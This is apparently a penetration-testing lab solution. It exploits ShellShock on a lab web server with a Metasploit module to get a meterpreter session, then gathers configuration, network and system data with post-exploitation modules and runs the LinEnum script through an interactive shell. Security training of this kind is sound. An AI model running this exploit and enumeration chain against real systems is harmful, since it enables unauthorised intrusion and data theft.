Solution

Step 1: Open the lab link to access the Kali GUI instance

Step 2: Identify the target IP address

To begin with you will need to identify the target system's IP address, this can be done by
running the following command:

Command:

ifconfig

As shown in the following screenshot, locate the IP address associated with theeth1interface, the
target IP address is the next IP within the subnet.

In this case the Kali Linux IP is 192.182.85.2 so the target IP will be 192.182.85.3.

Note: In your case the IP address will be different, ensure that you substitute the IP in your lab
environment with the one shown below.

Step 3: Port scanning with Nmap

Now that we have identified the target IP address, we can perform a port scan to identify
vulnerable services running on the target system. This can be done by running the following
command:

Command:

nmap -sV 192.182.85.3

As shown in the following screenshot, the Nmap scan reveals that the target has a web server
running on port 80.

For the purpose of saving time, the web server is hosting a web application that is vulnerable to
the ShellShock exploit that can be exploited through the use of a Metasploit exploit module.

Step 4: Gaining access

Now that we have identified the vulnerable service running on the target, we can start the
Metasploit Framework console (msfconsole) by running the following command:

Command:

msfconsole

We can now load the appropriate exploit module by running the following command:
Command:

use exploit/multi/http/apache_mod_cgi_bash_env_exec

We will now need to configure the module options, more specifically the target IP address, this
can be done by running the following command:
Command:

set RHOSTS 192.182.85.3

We will also need to set the TARGETURI option by running the following command:

Command:

set TARGETURI /gettime.cgi

We can now run the module by running the following command:

Command:

exploit
As shown in the following screenshot, if the exploit runs successfully, we will be provided with
a meterpreter session on the target system.

Step 5: Automating local enumeration with Metasploit

Now that we have gained access to the target system and have obtained a meterpreter session,
we can begin the process of automating local enumeration through the use of various Metasploit
post-exploitation modules.

To begin with, we can use the enum_configs module to enumerate various configuration files
stored on the target system.

To get started, you will need to put the meterpreter session in the background. This can be done
by running the following command:

Command:

background

We can now load the module by running the following command:

Command:

use post/linux/gather/enum_configs

We will now need to configure the module optons, in this case, the only option that needs to be
configured is the SESSION ID of themeterpretersession. This can be done by running the
following command:
Command:

set SESSION 1

We can now run the module by running the following command:

Command:

run
As shown in the preceding screenshot, the module will enumerate a list of configuration files on
the Linux target that can be analyzed to learn more about the target system.

We can use the enum_network module to automate the enumeration of networking information
from the target system.

We can now load the module by running the following command:

Command:

use post/linux/gather/enum_network

We will now need to configure the module optons, in this case, the only option that needs to be
configured is the SESSION ID of themeterpretersession. This can be done by running the
following command:
Command:

set SESSION 1

We can now run the module by running the following command:

Command:

run
As shown in the preceding screenshot, the module will enumerate networking information from
the target system and will store them in the local Metasploit loot directory.

As shown in the following screenshot, you can view the content of the configuration files by
using the cat utility.

Another useful module is the enum_system module that can be used to automate the
enumeration of local system information.

We can load the module by running the following command:

Command:

use post/linux/gather/enum_system

We will now need to configure the module optons, in this case, the only option that needs to be
configured is the SESSION ID of themeterpretersession. This can be done by running the
following command:
Command:

set SESSION 1
We can now run the module by running the following command:
Command:

run

As shown in the preceding screenshot, the module will enumerate information like the
Distribution name and release version in addition to other system information like the version of
the Linux kernel and user accounts which will all be stored in the loot directory for offline
analysis.

We can also check if the target system is a virtual machine through the use of
the checkvm module.

We can load the module by running the following command:

Command:

use post/linux/gather/checkvm

We will now need to configure the module optons, in this case, the only option that needs to be
configured is the SESSION ID of themeterpretersession. This can be done by running the
following command:
Command:

set SESSION 1

We can now run the module by running the following command:

Command:

run
As shown in the preceding screenshot, the target system is a virtual machine running on
theKVMhypervisor.
Step 6: Automating local enumeration with LinEnum

Now that we have explored how to use Metasploit modules to automate local enumeration on a
Windows target, we can begin exploring how to use LinEnum.

LinEnum is a bash script that is used by penetration testers automate local enumeration and
identify privilege escalation vectors on Linux systems.

In order to use this script, you will need to copy the script in to your lab environment. To begin
with, you can access the script through the following GitHub repository:
https://github.com/rebootuser/LinEnum

On the GitHub repo, navigate to the LinEnum.sh script as shown in the following screenshot.

You will then need to view the script in raw format, this can be done by clicking the raw button
as shown in the following screenshot.
You will now need to copy the content of the script in raw format and paste it in to the lab
environment clipboard.

Once you have copied the script from the GitHub repo, navigate back to the Kali Linux system in
your lab environment and create a new file with a text editor like leafpad.

Then paste in the script you copied in the file, after which save the file as LinEnum.sh as shown
in the following screenshots.
We can now navigate back to our meterpreter session and navigate to the tmp drive by running
the following command:

Command:**

cd /tmp

We can now upload the *LinEnum.sh* script we copied from the GitHub repo by running the
following command:
Command:

upload /root/Desktop/LinEnum.sh

We will now need to spawn a command shell session, this can be done by running the following
command:

Command:
shell

Command:

/bin/bash -i

We can now run the LinEnum.sh script by running the following commands:

Command:

chmod +x LinEnum.sh

Command:

./LinEnum.sh

As shown in the following screenshot, the LinEnum.sh script will run and will display the
results in the terminal.

Take a few minutes to go through the output and analyze what information LinEnum was able to
enumerate in addition to any potentially interesting information that we were unable to
enumerate manually or with Metasploit modules.